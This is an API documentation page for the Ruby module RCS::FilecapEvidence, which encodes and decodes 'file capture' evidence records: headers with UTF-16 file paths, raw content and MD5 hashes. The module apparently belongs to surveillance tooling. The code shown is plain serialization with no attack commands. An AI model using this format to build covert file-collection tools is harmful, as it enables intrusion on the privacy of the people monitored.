RubyDoc.info: Module: RCS::FilecapEvidence – Documentation for rcs-common (9.6.0)

#additional_header(*args) ⇒ `Object`

# File 'lib/rcs-common/evidence/file.rb', line 88

def additional_header(*args)
  hash = [args].flatten.first || {}

  path = hash[:path] || ["C:\\Documents\\Einstein.docx", "C:\\Documents\\arabic.docx"].sample
  @file = path[path.rindex(/\\|\//)+1..-1]

  path = path.to_utf16le_binary_null

  header = StringIO.new
  header.write [FILECAP_VERSION, path.size].pack("I*")
  header.write path

  header.string
end

#content(*args) ⇒ `Object`

# File 'lib/rcs-common/evidence/file.rb', line 73

def content(*args)
  bytes = [args].flatten.first || nil

  if bytes
    bytes
  else
    path = File.join(File.dirname(__FILE__), 'content', ['file'].sample, @file)
    File.open(path, 'rb') {|f| f.read }
  end
end

#decode_additional_header(data) ⇒ `Object`

Raises:

(EvidenceDeserializeError)

# File 'lib/rcs-common/evidence/file.rb', line 103

def decode_additional_header(data)
  raise EvidenceDeserializeError.new("incomplete FILECAP") if data.nil? or data.bytesize == 0

  binary = StringIO.new data

  version, file_name_len = binary.read(8).unpack("I*")
  raise EvidenceDeserializeError.new("invalid log version for FILECAP") unless version == FILECAP_VERSION

  ret = Hash.new
  ret[:data] = Hash.new
  ret[:data][:path] = binary.read(file_name_len).utf16le_to_utf8
  return ret
end

#decode_content(common_info, chunks) {|info| ... } ⇒ `Object`

Yields:

(info)

# File 'lib/rcs-common/evidence/file.rb', line 117

def decode_content(common_info, chunks)
  info = Hash[common_info]
  info[:data] = Hash.new if info[:data].nil?
  info[:data][:type] = :capture
  info[:grid_content] = chunks.join
  info[:data][:size] = info[:grid_content].bytesize
  info[:data][:md5] = Digest::MD5.hexdigest info[:grid_content]
  yield info if block_given?
  :delete_raw
end

#generate_content(*args) ⇒ `Object`



84
85
86

# File 'lib/rcs-common/evidence/file.rb', line 84

def generate_content(*args)
  [ content(*args) ]
end

Module: RCS::FilecapEvidence

Constant Summary collapse

Instance Method Summary collapse

Instance Method Details

#additional_header(*args) ⇒ `Object`

#content(*args) ⇒ `Object`

#decode_additional_header(data) ⇒ `Object`

#decode_content(common_info, chunks) {|info| ... } ⇒ `Object`

#generate_content(*args) ⇒ `Object`

Module: RCS::FilecapEvidence

Constant Summary collapse

Instance Method Summary collapse

Instance Method Details

#additional_header(*args) ⇒ Object

#content(*args) ⇒ Object

#decode_additional_header(data) ⇒ Object

#decode_content(common_info, chunks) {|info| ... } ⇒ Object

#generate_content(*args) ⇒ Object

#additional_header(*args) ⇒ `Object`

#content(*args) ⇒ `Object`

#decode_additional_header(data) ⇒ `Object`

#decode_content(common_info, chunks) {|info| ... } ⇒ `Object`

#generate_content(*args) ⇒ `Object`